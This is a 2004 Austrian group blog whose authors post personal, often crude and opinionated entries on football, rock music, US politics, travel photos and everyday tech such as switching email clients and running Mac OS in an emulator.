weil die kpö aufgrund des schändlichen entzuges von ddr-kohle auf einmal bettelarm ist, muss sie das seit 1990 besetzte, legendäre ernst kirchweger haus verkaufen. da in österreich sogar die linke anarcho-szene eine beamtenseele hat und auf das gewohnheitsrecht pocht, ist die von kollektiver empöruung getragene protest-homepage zum plärren witzig. folgender höhepunkt der politisch-korrekten alltagsprosa ist allerdings einem fm4-artikel zu diesem thema entnommen:

Seit 1990 wird ein von der (damals) finanzstarken KPÖ wenig bis gar nicht genutztes Haus in der Wielandgasse von AktivistInnen der Wiener HausbesetzerInnenszene und dem linken türkischen Verein atigf besetzt. Als inter/antinationalistisches, antifaschistisches, selbstverwaltetes Zentrum erhält es den Namen Ernst Kirchwegers und gilt als "besetztes" Haus.

*lol*
für die freunde von 2minuten17voigasgeradeausaberbittenureinriff-songs  rriot  06.11.2004 02:22:15
das cover rechts zeigt den auslöser meiner allzeit-liebe zu songs eben dieser art. gerade mal wieder ausgegraben. und ich finde das immer noch genauso messerscharf wie 1980/81 als mir mein bruder das geschenkt hat. wer die platte irgendwo auftreibt - BLIND KAUFEN! TRUST ME! und dann bitte noch hier und hier wühlen.
moore bush  sTe  05.11.2004 17:26:16
"somewhere down in Texas there´s a village missing an idiot."

bild rechts stellt eine collage aus gefallenen US soldaten dar.

17 Reasons Not to Slit Your Wrists (by Michael Moore)

new subdomains  sTe  04.11.2004 01:53:25
feelochamp.feelosophee.com
photos.feelosophee.com
mia.feelosophee.com
:: Tja, jedes Land ...  bully  04.11.2004 00:48:42


... bekommt den Präsidenten und die Regierung, die es verdient. Mehr hab ich dazu nicht zu sagen.





hier übrigens die aktuelle titel-seite des daily mirrors:





years in review  sTe  02.11.2004 16:31:52
i picked the main layouts for every year, besides there have been several small updates in between, not to mention.
5th year  sTe  01.11.2004 23:29:54
:: Osama´s Rede  bully  30.10.2004 20:38:52

wen´s interessiert:

die englische transkription seiner rede an das amerikanische volk gibts HIER.
bet a vote  sTe  28.10.2004 01:24:16
http://betavote.com (thx uti)
inbox  sTe  25.10.2004 01:14:46
das naechste microsoft programm gekuebelt - zu lange hab ich auf essentielle, eigentlich hundseinfache features, gewartet: outlook raus - thunderbird rein;
und dies ist kein taktischer sondern praktischer wechsel;
wenn man auf keine exchange server anbindung angewiesen ist, momentan sicher der email client der stunde;
lots of extensions, plain and simple...
She just knows what I need!!  romario11  23.10.2004 05:13:57
Look what I got for birthday today from my Honeybunny - it is almost a library of Football books! And a Homer beerglass too. And a Formula One book as well. Yeaah baby!! Now there are no excuses anymore, this stuff is to be read and a quiz will follow shortly.

Have a nice weekend all, romario11.
special service  sTe  20.10.2004 20:10:29
fuer alle die lust haben, feelosophee bietet ab sofort die möglichkeit eure photos online zu stellen. wer will -> mail
CONGRAZ AN DEN ALLERGRÖSSTEN!  rriot  17.10.2004 19:42:51


vergesst den formel 1-tjure. der grösste motorsportler der welt heisst seit heute endgültig VALENTINO ROSSI. wenn michael schumacher auf BAR oder sauber weltmeister wird, dann ist er mit "the doctor" auf augenhöhe...
:: ZENSUR  bully  15.10.2004 20:08:09

Das FBI hat letzte Woche eine Reihe von Anti-Kriegs- und Anti-Globalisierung-Websites aus dem Netz genommen.
Halt ich für sehr bedenklich...

Der Artikel

Noch bedenklicher: Wer oder welche Behörde kann gegen so eine Aktion eigentlich einschreiten??? Kann man dagegen klagen?? Wo??? Bei nationalen Gerichten? Gibts einen zuständigen obersten Gerichtshof?...
Ein guter Tag beginnt mit ...  sTe  13.10.2004 04:01:47
... dem Rücktritt des Finanzministers.

lang KANNS einfach nicht mehr dauern...
wie lang muss ich mir die feigen ausreden des warmen eierbaeren noch anhoeren...
short and simple  sTe  10.10.2004 18:57:45
- chello ist nun auch bei mir wirklich schnell (2560 Kb/s d) / (ca 350 Kb/s u)
- counterstrike source ist endlich final (server up´ running)
- "Zurück zum Glück" ist auch schon da
:: AUTUMN IN VIENNA  bully  05.10.2004 01:48:06
Hier die ersten gewünschten Herbstimpressionen.

Aufgenommen am ersten Sonntag im Oktober im Lainzer Tiergarten.
:: ONLINE-AUSARBEITUNG DIGITALER BILDER -
EIN ERFAHRUNGSAUSTAUSCH
  bully  04.10.2004 17:37:32

Da ja nun doch immer mehr im Besitz einer digitalen Kamera sind, stellt sich die Frage, wie man zu den Fotos kommt...

Manche kämpfen wohl mit Fotopapier und Ihrem hauseigenen Farbdrucker, manche legen sich einen eigenen Fotodrucker zu, andere aber bevorzugen diese Arbeit outzusourcen und bedienen sich der Online-Fotoausarbeiter - wie auch ich.

Letzte Woche wurde erstmals der Versuch unternommen. Und zwar beim Müller.
Sonntag Nacht wurden die Bilder upgeloaded, die verschiedenen Größen angegeben und die Bilder bestellt. Donnerstag Vormittag waren diese in der gewünschten Filiale (Mariahilfer Straße) abholbereit.

Der Preis war meiner Ansicht nach sehr OK:
17 Fotos im Format 11x17
3 Fotos im Format 20x30
Gesamtpreis inkl. allem EUR 7,70.

Die Qualität war bei fast allen Fotos hervorragend; nur bei einem der großen Fotos sah die Haut der abgebildeten Personen aus als wär sie sehr stark geschminkt.

Alles in allem aber ein sehr gelungenes Experiment. Wer hat andere / bessere / schlechtere Erfahrungen gemacht?
herbst impressionen  sTe  27.09.2004 02:01:41
schoene tage im herbst sind ja mmn kaum zu toppen; heute zb im prater kastanien sammeln; zwar mit kopf einziehen weil bombardement von oben;
ich lade hiermit alle ein mir moeglichst farbenfrohe photos zu schicken (herbst@feelosophee.com) um eine gallery zu erstellen;
Unter dem motto: "Ein Fest der Farben, das der Herbst zum Abschied gibt, bevor Tristesse siegt."
Arsch TV!  rriot  26.09.2004 04:56:36
die sprachliche und journalistische qualität der kommentatoren ist eine dreckschweinerei. diese flachbirne hat nicht EINEN satz unfallfrei über die lippen gebracht. "volltreffer" bleibt eine echte zumutung. aber hauptsache "three lions" blasphemisch für einen jingle versauen...
und von dem nach fiiish stinkenden vollkoffer da rechts fang ich erst gar nicht an! *grrrrrr*
:: HAMBURG REVISITED (18. - 22.09.2004)  bully  25.09.2004 16:50:58

Unser Trip nach Hamburg begann mit einem Paukenschlag:
Sa. 7:30 Uhr, Schwechat, wir treffen 2 alte Bekannte aus lang vergangenene Zeiten ;-)))

Gewässer-Impressionen aus der Hansestadt:
Binnenalster
Fischmarkt 1 und 2
Speicherstadt
Elbe 1 und 2

Besonders gut einkaufen kann man in Hamburg übrigens im Karoviertlel. Eine seeeehr schöne Jacke hätten wir dort auch gesehen, diese war allerdings leider eher für 15-jährige magersüchtige konzipiert...

Derzeit macht in Hamburg gerade der WM-Globus (Infos) Station. Interaktivität wird gross geschrieben. Man kann sich selbst testen bezüglich aller jemals bei Fussball-WMs gespielten Spiele (Ergebnisse-Raten oder -Wissen). Schiri spielen - Situationen von diversen WMs werden vorgespielt. In Echtzeit muss man entscheiden (Abseits oder nicht, Schwalbe oder Foul, Gelb oder Rot, ...), die Auflösung folgt dann mit Zeitlupe der jeweiligen Situation. Ausserdem sind auch eine Menge Fussball-Memorabilia zu bewundern, unter anderem auch die zwei originalen WM-Pokale: der Coupe Jules Rimet und der FIFA World Cup.

We had a wonderful time!!! :-)))

(all images resized to 1024x768 and © bully)
BURN BABY BURN!  rriot  25.09.2004 15:05:38
Alles für scharfen Spass am Abend und erst recht am Morgen danach.
Besonders Ambitionierte drücken auch noch hier.
Ich darf zitieren: "Hier erfahren Sie etwas über scharfe Dinge die man auf einem kleinen Balkon treiben kann." Na also...
geschichte wird gemacht!  rriot  25.09.2004 04:32:19
vielleicht hat ja einer der technisch versierteren hier lust, den lauf der geschichte zu verändern. ein artikel aus der zeit könnte als kleine anregung dienen. das wäre doch mal eine nette geschichte für die enkelkinder...
(A)nti(A)utofreier(T)ag  sTe  22.09.2004 17:07:17
heute ists mal wieder soweit: wieder so ein pseudo motto fuer einen tag: autofrei, ja klar; ich seh sie schon die initiatoren: die gruenen jutekacker, die alternativen weltverbesserer! mich kotzt diese Anti-Auto-Propaganda sowas von an!
und der stadtverwaltung faellt nichts besseres ein als alibimaessig mitzumachen!
marketing  sTe  16.09.2004 22:45:18
einfach koestlich (via rriot)
traffic  sTe  15.09.2004 19:32:04
an interesting pilot project I hadn´t heard of: real time traffic flow in Antwerp, Belgium will be measured by "anonymously" sampling the positions of mobile phones in moving vehicles.
world  sTe  15.09.2004 00:44:21
the fool´s world map is a project visualising the world seen by the many fools of the world, with what seems to be a focus on the american strain in this case.
sponsoring  sTe  14.09.2004 20:21:24
indeed! unterstuetzt die youngPROs in form des webauftritts; aktiv als spieler fuehle ich mich schon zu alt :)
american idiot  sTe  14.09.2004 05:23:11
green day (mitlerweile 14 jahre!!! alt, da merkt man wie die zeit vergeht) hat mmn das beste album seit dookie fertiggestellt.
und sich damit jetzt endgueltig in meine punk-rock favorits vorkatapultiert. ein neuer producer war offensichtlich ein goldgriff...; ein absolut komplettes album, endlich wiedermal!
ps: man lasse sich nicht taeuschen durch die erste single, aber hoehrt selbst...
landed...  sTe  11.09.2004 22:11:23
...savely in mattsee, beautiful weather, nice but small room and the celebration is just 100m away...short to say: pretty urig
bc, bc...in tha house!  sTe  09.09.2004 22:36:03
finally the´ve arrived! new shiney buisnesscards...;
took us three month to agree on one ´red´ :)
next things are doorplates for sure, and maybe lighters...



:: HITS & SACKS, RUSHES & TOUCHDOWNS  bully  08.09.2004 07:04:18

Die NFL geht in der Nacht von Donnerstag auf Freitag in die neue Saison!!! ENDLICH!!!!

Kick Off ist am Freitag um 3 Uhr früh unserer Zeit. Der ORF überträgt ab 2:40 Uhr live:
NEW ENGLAND PATRIOTS - INDIANAPOLIS COLTS

Schon der Auftakt verspricht ein echter Hammer zu werden!!!

Als kleine Einstimmungshilfe hier ein Zusammenschnitt der besten NFL-Hits aller Zeiten, wow!!!!

Favoriten auf den Superbowl gibt es wie jedes Jahr mindestens 10 bis 15; da gibts die üblichen Verdächtigen wie Patriots, Eagles, Chiefs und Colts, heuer aber auch sicher zu beachten sein werden die Seahawks, die Vikings und die Browns. Ich persönlich hoffe, dass die Kurve der Lions weiter nach oben zeigt und sie vielleicht auch mal wieder in die Playoffs kommen. RRROOOAAAARRR!!!


PS: Auch im Hockey gehts manchmal schön zur Sache: Sami Kapanen von den Philadelphia Flyers hat leichte Probleme seine Balance wiederzufinden... ;-)))
ein Check vom Feinsten !!! ÄUSSERST SEHENSWERT!!!
seeded  sTe  05.09.2004 17:44:20
with Abattoir Blues/The Lyre Of Orpheus we have something that few could have expected - two albums that can both be regarded as self-contained masterpieces; two storming, driving, relentless, devotional, slinky, subtle, heartbreakingly-beautiful records that, lyrically, switch from the cynical to the sanguine, the defeated to the defiant, dealing in love, war, beauty, children, romance, rejection, Pethedine, poetry, panties, God, Auden, Johnny Cash, cold potatoes, too-much-money, not enough money, writer’s block, flowers, animals and more flowers. but maybe i am projecting here.

"There aren´t many things you can count on in this world. Thankfully, no matter how life lets you down, you can always rest assured Nick Cave is having a lousier time than you. Or at least pretending to."
-- Darryl Sterdan, Winnipeg Sun
:: LA TUNISIE  bully  05.09.2004 01:14:00

Nach einer wunderschönen Woche in Tunesien sind wir heute glücklich und erholt nach Wien zurückgekehrt.

Wir haben vieles erlebt und viel gesehen:

+ Sonnenaufgang 1 2 3 4 5 6
+ ein ganzer Tag in Tunis 1 2 3 4 5 6 7
+ Piratenschiffe in Sousse 1 2 3 4
+ und vieles mehr...
auf der Strasse
neben der Strasse
Skurriles :-(((
Jasmin
was Rotes
ein Spatz
einer der vier Pools
am Abend am Strand
wir 2 in Port El Kantaoui
Sonnenuntergang im Hafen

Die neue Cam war natürlich wie man sieht im Dauereinsatz und hat uns vollstens überzeugt!!!

zur Verdeutlichung, was ein 10x-Zoom kann:
normales Bild
10-fach gezoomt

Wir hatten eine wunderbare Zeit,

MERCI LA TUNSIE!!!

MERCI PORT EL KANTAOUI!!!


(all images resized to 1024x768)
which pill  sTe  01.09.2004 15:15:08
I try to avoid the whole posting about web standards thing as there are many people out there doing a fine job already. However, let´s kill two birds with one stone: to the 67% of my visitors still hitting this site in Internet Explorer, who don´t know about or are too lazy to switch to a better and safer web browser, and in order to increase pagerank for sites that deserve it, here´s an assortment of worthwhile places to visit:
email account givaway  sTe  30.08.2004 18:12:32
who wants a gmail account; i´ve 5 more to give
Let there be light  romario11  30.08.2004 04:05:14
Just returned from hot but beautiful Lisbon (thanks for this, FALTER!) which I can only recommend everyone to visit one day.

History is all around in this city which was built on numerous hills and leaves you with a choice of views to get an overview from each possible angle. Also nice: the remains of the EURO which can still be found on almost every corner. Very impressive: the phone booths styled as big footballs carrying the EURO logo.

Very recommendable: the Portuguese beer which basically comes in two forms - Sagres and Super Bock (despite its name it has a reasonable 5,5% alc). Both are fantastic in taste.
:: BETANDWIN  bully  18.08.2004 23:00:45

tststsss

betandwin is da aber nicht sehr fair, find ich...

auf sport1.de schaut die quote für AUT - GER heute so aus:




und auf sport1.at so:

:: my new cam...  bully  18.08.2004 20:23:24

... has arrived!!! und die 256MB-karte gleich mit...

scheeeeeee!!!

mehr infos dazu gibts hier.
let the games begin...  sTe  13.08.2004 16:38:20
google schaut nett aus heute....
boom  sTe  12.08.2004 05:06:50
two couples wish to silently, and proudly announce that they are expecting a baby, due in march;
to draw the curtain:
first is Franca & Bully, and yes, second its us, again!

boy or a girl? yes, one or the other.
as yet to say that everythings fine.
misc  sTe  11.08.2004 19:36:39
are you hungry and do you like trash and do you want to sleep save...
zwischendurch...  sTe  09.08.2004 17:06:01
spielt man office leisure (thx darkseid)
summertime  sTe  09.08.2004 06:36:14
ich weiss schon warum ich meine wurzeln NEVER EVER vergesse!
schoenes wetter in salzburg ist ultimativ! auch darum ...
olympia scheduler  sTe  03.08.2004 20:14:05
da die offizielle site: athens2004.com doch eher unuebersichtlich gestaltet ist, gibts hier auf feelosport einen feelolympia terminkalender
doomsday  sTe  02.08.2004 06:33:36
Doom III has landed! erster eindruck: ja ist beeindruckend, soweit man das ohne X800 ueberhaupt sagen kann; mit meiner saphire rennt das ding halbwegs fluessig, mit dem bitteren beigeschmack dass ja noch soviel mehr drinnen waere...und genau das stoert mich: zu sagen, dass das game eigentlich auf die uebernaechste, noch gar nicht erhaeltliche, grafik karten generation optimiert ist...; mmn ein mutiges statement, dem ich aber jetzt und hier keinen glauben schenken mag! klar ist der business/developementplan von game und grafikkarten herstellern eng aneinandergebunden, aber so zukunftsorientiert hat sich noch keiner aus dem fenster gelehnt; va wenn man davon ausgehen kann dass erst in ca 2 jahren der durchschnitts gambler die optimalsten hardware voraussetzungen erfuellt! mit meiner konfiguration kommt Far Cry besser; das liegt subjektiv aber auch am storyboard!
ps: und counter-strike 2 (HL) is eh auch bald da :) dffdfdfdf
high  sTe  01.08.2004 15:07:11
dass stangenbohnen (Phaseolus vulgaris var. vulgaris) in die höhe wachsen war mir klar;
dass sie aber 2,5 m hoch werden verbluefft dann doch; gestern haben sie die decke des wintergartens erreicht, und das nach exakt 5 wochen!


COPA AMERICA  bully  25.07.2004 19:25:58


Erstmals in der 88-jährigen Geschichte der Südamerika-Meisterschaft prallen heute Nacht die beiden Giganten des Kontinents in einem ´echten´ Endspiel aufeinander.


Argentinien - Brasilien
22.00 Uhr MESZ in Lima


Im Gratis-TV wird dieses Grossereignis totgeschwiegen, Premiere überträgt live ab 21.50 Uhr (SPORT2) für die bereits Wahlberechtigten.


Warum die nach der EURO wohl wichtigste und beste Kontinental-Meisterschaft bei uns so stiefmütterlich behandelt wird, ist mir wirklich ein Rätsel.
enjoying...  sTe  24.07.2004 04:35:55
eine meiner wirklichen, von anfang an ´erlebten´ legenden des rocks hat sich selbst uebertroffen: Pearl Jams ´Live At Benaroya Hall - Oct.22, 2003, Seattle´;
darauf finden sich solche *perlen* wie Bob Dylan´s ´Masters Of War´ Johnny Cash´s ´25 Minutes To Go´ oder ´I Believe In Miracles" von den Ramones. Und last but not least die erste live-performance von ´Man Of The Hour´!
absolutes highlight auch das solo in ´All Or None´

eigentlich weiss ich nicht was besser passt: ein gutes glass rotwein oder doch dosenbier - und eigentlich spricht genau das fuer die stimmungsvielfalt:
SO PROFOUND & SO LOOSE
Pearl Jam @ Wiki
annoying...  sTe  22.07.2004 05:58:36
immer wieder amuesant zu sehen, wie sich ein welbild bei erfolg verformt.
dass es sich hierbei auch noch mmn um eine minderbemittelte, eher ueberschaetzte combo handelt, traegt
nicht unmassgaeblich zur bestaetigung bei; zuerst auf pseudo harte-depressivo-metal-anarchos machen und dann schon
bei der 2.!!! scheibe das establishment rufen; hut ab - thumbs down! als vorband von metallica ist ein fixplatz reserviert!
PS:nein, und das ist kein genereller print vom label!
PPS: und die fans werns trotzdem klass finden und sich nicht den kopf zerbrechen,...oder vor ebendiesen gestossen fuehlen, weil im grunde eh nur alles marketing is (man kann ja anti-piracy-warning anders deuten )...und genau das ist wiederum...na muss eh jeder selber wissen...; straight ist anders...
curtains up!  sTe  15.07.2004 00:38:51
indeed! - your communication network
finally - its online, indeed!
PS: heut gehts dahin: und auch TTA-Group online!
hey, hey,...wiki  sTe  14.07.2004 21:38:50
einige werns eh scho kennen, aber anlaesslich des 100000 artikels, moecht ich gerne noch mal drauf verweisen:
wikipedia - die freie online-enzyklopaedie;
das spezielle an der gschicht ist das JEDER dort artikel verfassen, bestehende editieren und ergaenzen, bzw ueber ein theme diskutieren kann;
damit sich editier- und abstimmungsprozesse nicht ueberschneiden oder in chaos ausarten, sind nicht alle nutzer voellig gleichberechtigt. administratoren lenken die redaktionellen ablaeufe. sie koennen beitraege sperren oder loeschen und stoerenfriede von der plattform verbannen, wenn sie sich nicht auf eine sachliche diskussion einlassen. die administratoren arbeiten uebrigens ehrenamtlich;
hurra, hurra...  bully  13.07.2004 19:52:15

... da ösna peda is wieder da!!!

ATV+ ist ein echter Fang gelungen:

Peter Elstner, der nur schweren Herzens beim ORF aufgehört hatte (Zwangspension), wird vom Privatsender reaktiviert und wird wieder zum Mikro greifen.

booooaaahhh!!!


SUUUUPER!!!!!!!
The Stooges in Wiesen  bully  12.07.2004 17:11:03
wow!!! what a concert!!! very surprising!!!

da iggy spielt mit den stooges in wiesen auf, volle power, stagediving bis die securities verzweifeln, ABER:
sie spielen wirklich NUR Stooges-Lieder!!! entweder ganz neu (drei, vier lieder von der skull ring) oder gaaaanz alt (von der stooges und der funhouse).

loose, no fun, 1969, tv eye, und und und. als besonderes schmankerl: i wanna be your dog gleich doppelt (als 4. und dann auch nochmal als letzte zugabe)!!!
war halt eher das repertoire einer band, die´s seit 3 jahren gibt und nicht seit 37...

daher wars auch eher kurz (75 minuten). aber jede minute, jeder song und jedes posing des heroen und seiner alten crew war rock pur und auf jeden fall den eintritt wert.

kurze nebenbemerkung: nachdem letztes jahr der sound im gasometer ja unter jeder kritik war, war er diesmal wirklich fantastisch!!!

a gig you wouldn´t wanna miss!!!!! thank you, iggy!!! thank you, stooges!!!

fm4:
Alle Redaktionsmitglieder sind der Meinung das war be-mer-kens-wert. Meine Spontan Diagonse: Es hat einen 60jährigen Mann gebraucht, um am letzen Tag als letzter Act dem Ganzen eine Ahnung von Rock´n´Roll zu entlocken. Das spricht eher für Qualität als für Innovation. Iggy, thank so much, for keeping every dream alive.

standard:
Es beginnt mit einer Hymne an den Kontrollverlust: "I´m loose!" Das hier ist ein brutaler, ein einfach gestrickter Schrei aus der Steinzeit der Rockmusik: Hunger, Durst, lästig, fad! Damals, Ende der 60er-Jahre, wandte man sich in einem Vorort von Detroit nicht nur gegen Blumen im Haar, gegen die Idee des nur Zeit raubenden, also reichlich sinnlosen Vorspiels, gegen wenig hilfreiche Zivilisationsleistungen wie das Konzept der Nüchternheit - oder zu dumpfem Kriegstrommelrhythmus auch gegen die Vision einer friedlichen Gesellschaft im Allgemeinen: "It´s 1969, okay?! There´s war, war, war across the USA!"...
Der Amoklauf als künstlerisches Statement. Ein großer Abend. Das mit dem Weltfrieden regeln wir ein anderes Mal. Heute sind wir jung und deppert.
ganzer artikel

salzburger nachrichten:
Festivalabschluss und Geschichtsforschung stellte der Auftritt von Iggy Pop & The Stooges dar. Der wie eh und je hagere Urvater des Punk demonstrierte leidenschaftlich wie man alle Rockrevolutionen nicht nur überlebt, sondern wie sie einen nach gut 30 Jahren im Geschäft am Leben erhalten.

die presse:
...den Rhythmus mehr zerstückelnd als füllend, ohne den leisesten Anflug von Geschmeidigkeit, Subtilität, Groove. Wie es sich gehört für Stücke der Stooges. Die sind nämlich ganz und gar nicht subtil, nicht einmal dramatisch: Wut und Langweile beugen sich keiner Dramaturgie. Und diese rohen, rudimentär strukturierten Portionen an Wut und Langweile sind bis heute unübertroffen, zeitlos: "1969" ist nicht ans Jahr gebunden und "No Fun" nicht an die Jugend - dass das Leben keine Hetz ist, diese Wahrheit besänftigt keine Altersmilde....
Hier wurde Schmerz in Schmerz übersetzt, ohne Dolmetscher, ohne second thought. Unreflektiert. Würdelos. Bestürzend. Großartig.
ganzer artikel
sad but true2  sTe  09.07.2004 02:28:46
kaum hats EINmal ueber 30° geht schon die erste festplatte des sommers krachen; und das trotz der 2 superturbinen und kuehlplatte;
gut, sie war alt, sie war im dauereinsatz, sie war gebackuped, jedoch stehts ein treuer begleiter, tag und nacht; ihr name war "Big_One" und hatte nichts ausser musik in sich; RIP!!!
sad but true  sTe  07.07.2004 19:34:12
...eines der letzten politischen gewissen ist gegangen




kawa pc  sTe  06.07.2004 21:55:54
This geek has mounted a full PC in the back of his 2003 Kawasaki Z1000 and is using it to record video footage from a helmet mounted camera through a BT848 card!
gmail  sTe  01.07.2004 23:31:16
soeben einen Gmail account gecheckt; mal schaun wie sich das entwickelt...;
die meinungen gehen ja eher auseinander...pro & contra
OSX  sTe  28.06.2004 18:42:13
endlich ein mac os am pc zum laufen gebracht: pearpc machts moeglich, wenn auch mit eher langsamer funktionalitaet. aber zum webseiten testen reichts :)
tricky war eigentlich nur das netzwerk einzurichten, aber auch das geht mitlerweile;
screenshots here: osx1, osx2, osx3, osx4
3,2,1....puls  sTe  21.06.2004 23:04:47
ein neuer wiener sender, der nochdazu einer unser kunden ist, ist seit 17:00 on air: pulsTV
empfangbar unter:
terrestrisch auf der bisherigen frequenz von ORF 2 (kanal 34) oder kanal 10 im kabelnetz
all the best...nano
nifty tool  sTe  21.06.2004 00:50:17
Have you ever bored by this Windows message : "Error Deleting File or Folder, ... There has been a sharing violation. The source or destination file may be in use.", when you try to delete, move or rename a file ? try WhoLockMe
back in town...  sTe  20.06.2004 02:25:59

...and welcome bad weather! zzZ
tutto bello  sTe  15.06.2004 02:41:32
:: EURO 2004 / updated june 28th  bully  10.06.2004 00:24:24

3 days to go...

euro 2004 is about to begin...

gerade noch zeit um ein bisschen fachzusimpeln, prognosen abzugeben und sich über könig fussball zu unterhalten!!!

ich rechne ja eigentlich schon mit ein paar überraschungen; allerdings erst ab den ko spielen...

hier nun mal meine prognosen:

gruppe a:
wohl die eindeutigste gruppe; ich glaub kaum, dass die griechen oder russen den favoriten spanien und portugal die suppe versalzen können.

gruppe b:
auch hier scheint soweit alles klar, obwohl die kroaten sicher sehr stark auftreten werden und nicht zu unterschätzen sind. dennoch heissen meine aufsteiger frankreich und england.

gruppe c:
eine sehr ausgeglichene gruppe, vor allem wenn man sich erinnert, wie schwer sich die azzurri immer in den vorrunden tun. meine aufsteiger heissen trotzdem italien und schweden.

gruppe d:
die killer-gruppe; wohl unbestritten, dass hier drei aus dem erweiterten favoriten-kreis in einer gruppe spielen. für mich ist ein aufsteiger mit tschechien fix, auch wenns ein riskanter tipp ist ;-). der zweite aufsteiger wird sich meiner meinung nach schon am nächsten dienstag herauskristallisieren und lautet für mich leider deutschland -> ergo holland goes home...

mehr dann nach der vorrunde ;-)))

have fun, all you football-fanatics!!!

zwei neuerungen dieser euro sollten wohl noch kurz erwähnt werden:
dass das silver goal das golden goal abgelöst hat, ist wohl inzwischen hinlänglich bekannt. die entsprechende erläuterung gabs auf feelo schon hier.
die zweite neuerung betrifft das elfmeterschiessen in den gruppenspielen. dazu ein kleines beispiel: sollten in gruppe c schweden und dänemark nach zwei spielen (gegen bulgarien und italien) beide die gleiche punkteanzahl (zb 3) und die exakt gleiche tordifferenz haben (zb 2:2) und das spiel 3 schweden - dänemark endet unentschieden, kommt es direkt nach 90 minuten zum entscheidenden elfmeterschiessen um den aufstieg ins viertelfinale.

aja, nochwas...
mein tipp fürs finale:
italia - france 4-1


UPDATE (JUNE 20th):

16 von 31 spielen sind gespielt, jedes team hat sich bis jetzt zwei mal präsentiert, einige überraschungen sind schon passiert. zeit ein bisschen zurückzublicken und ausserdem kann wieder ein bisschen prognostiziert werden. ein paar konturen der nächsten zwei wochen sind durchaus schon erkennbar.

GRUPPE A:
die portugiesen sind schwächer als erwartet, da täuscht auch ein mühsamer sieg gegen zu unrecht dezimierte russen nicht darüber hinweg. die griechen spielen aufopferungsvoll, mit einem schuss deutscher tugend und haben sich den sieg gegen portugal redlich verdient. das remis gegen spanien war zwar etwas glücklich aber letzlich auch nicht unverdient. russland ist erwartet schwach und die spanier sind irgendwie so drauf wie bei immer bei den letzten grossereignissen; ganz gut aber nicht gut genug um wirklich weit zu kommen.

prognose:
die griechen verlieren nicht gegen russland und die spanier nicht gegen die portugiesen. wer die gruppe gewinnt ist schwer zu sagen, die griechen haben die besseren chancen.

GRUPPE B:
diese gruppe rennt wohl relativ so wie man es erwarten konnte (vom remis der kroaten gegen frankreich mal abgesehen). zidane spielt phantastisch, der rest des französischen teams ist zwar nicht schlecht, aber noch meilenweit von vorstellungen wie in frankreich98 oder bei der euro00 entfernt. die engländer spielen erfrischend und schnell. die schweizer sind erwartet schwach, die kroaten zwar etwas besser aber halt nicht gut genug.

prognose:
frankreich gewinnt klar gegen die schweiz und gewinnt die gruppe. kroatien gewinnt nicht gegen england -> england wird gruppenzweiter.

GRUPPE C:
die bulgaren sind wie erwartet nur als punktelieferant bei dieser euro. der rest ist rechnerei. aber eines muss jetzt mal gesagt werden: DIE ITALIENER WERDENS NIIIIIE LERNEN!!! das is immer das gleiche!! schwach zu beginn; gegen die dänen ein glückliches unentschieden und dann spielen sie gegen die schweden 60 minuten lang gross auf. aber statt weiter druck zu machen und auf ein zweites tor zu drängen wird ein offensiver nach dem anderen durch einen defensiven ersetzt und es kommt wie es kommen muss. der ausgleich der schweden. die schweden hingegen hatten zwar anfangs den italienern nicht viel entgegenzusetzen, haben aber gekämpft riskiert und letztlich einen punkt gewonnen.

prognose:
eine sehr gefährliche situation für die italiener; zwar ist nicht damit zu rechnen, dass sich die dänen und die schweden wirklich ein 2-2 ausmachen, aber die wahrscheinlichkeit ist sehr hoch. keine mannschaft wird, wenn sie zb in der 60 minuten 2-1 führt noch sonderlich viel riskieren. der ausgleich wäre eine frage der zeit. auch kann man beiden teams nicht vorwerfen, wenn sie dann vor schluss beim stand von 2-2 nicht mehr viel tun, aber die italiener sind selber schuld und können nur die bulgaren (mindestens mit 2 toren unterschied) schlagen und hoffen, dass das andere spiel nicht mit einem 2-2 oder einem höheren remis endet. (bei einem 1-0 der italiener reicht den dänen und schweden schon ein 1-1 für den gemeinsamen aufstieg.) ich glaube, dass sich die skandinavier schiedlich friedlich 2-2 trennen. arrividerci, italiani. auch wenn italien noch aufsteigt, ist für mich jetzt für italien (weil sie eben nicht mehr gruppensieger werden können) im viertelfinale gegen die tschechen schluss.

GRUPPE D:
WOW!!! was war das für ein spiel gestern???!!! 90 minuten powerfussball, eine grosschance nach der anderen, herausragende torhüterleistungen, angriffsfussball, dass es eine freude war!!! DAS IST FUSSBALL!!! die tschechen stehen verdient im viertelfinale und wenn sie so spielen wie gestern brauchen sie wohl kein team der welt zu fürchten. die deutschen, die im ersten spiel zwar nicht berauschend gespielt haben, aber doch positiv überraschten, zeigten gestern wieder ihr wahres gesicht; einfallslos und viiiel glück. das 0-0 war sogar schmeichelhaft für die deutschen. trotzdem schaut es für sie nun gar nicht so schlecht aus. ein sieg gegen die schon als gruppensieger feststehenden tschechen und man steht als gruppenzweiter im viertelfinale. um die holländer wäre es sehr schade.

prognose:
holland gewinnt überzeugend gegen lettland. auch nicht mehr ganz so motivierte tschechen, wo wahrscheilich sogar ein paar stützen geschont werden, sind stark genug um gegen deutschland zu gewinnen. tschechien gruppensieger, eh klar. holland wird gruppenzweiter. *hoff*

schon jetzt ist für mich klar, dass die untere hälfte um einiges schwerer ist. wenn deutschland doch noch aufsteigt, könnten sie wie bei der wm vor 2 jahren mit glück wieder bis ins finale vorstossen (im oberen ast). ich rechne aber eher mit folgenden viertelfinalpartien:
griechenland - england
schweden - holland
frankreich - spanien
tschechien - dänemark
sollte es wirklich so kommen (wirds wahrscheinlich eh ned, ein tipp fällt immer um), könnten wir uns womöglich auf folgende halbfinal-partien freuen:
england - holland
frankreich - tschechien
und ich muss ganz ehrlich sagen, dass ich bezüglich des finales nix aber auch gar nix gegen die wiederholung des gestrigen spiels einzuwenden hätte!!!

UPDATE (JUNE 23rd):

ok, die viertelfinali stehen fest.

spanien raus, italien raus, deutschland raus!!!
alle verdient!!!

meine tipps für die halbfinali:
england - holland
frankreich - tschechien

ich glaube aber, dass alle spiele, durch die bank, knapp und spannend werden, alle vier anderen teams haben durchaus das zeug zu überraschen (die griechen wohl nur, weil sie auf den schwächsten der 4 gruppensieger treffen). und für portugal sollte jetzt wirklich schluss sein; wow, das sehn wir ja schon morgen, YES!!!!

zur erheiterung hier noch ein paar zitate der bild:

+ 66. Minute: Ballack aus 16 m an den Pfosten, Schneider muss den Abpraller aus 10 m nur reindrücken – doch der Obertrottel stümpert Keeper Blazek die Kugel in die Arme! Das geht doch gar nicht...

+ Wir sind einfach zu blöd zum Tore schießen. Und unsere Abwehr ist sowieso sauschlecht.

+ Seit acht Jahren haben wir kein EM-Spiel mehr gewonnen. Eine Schande! Schämt euch, ihr Versager!

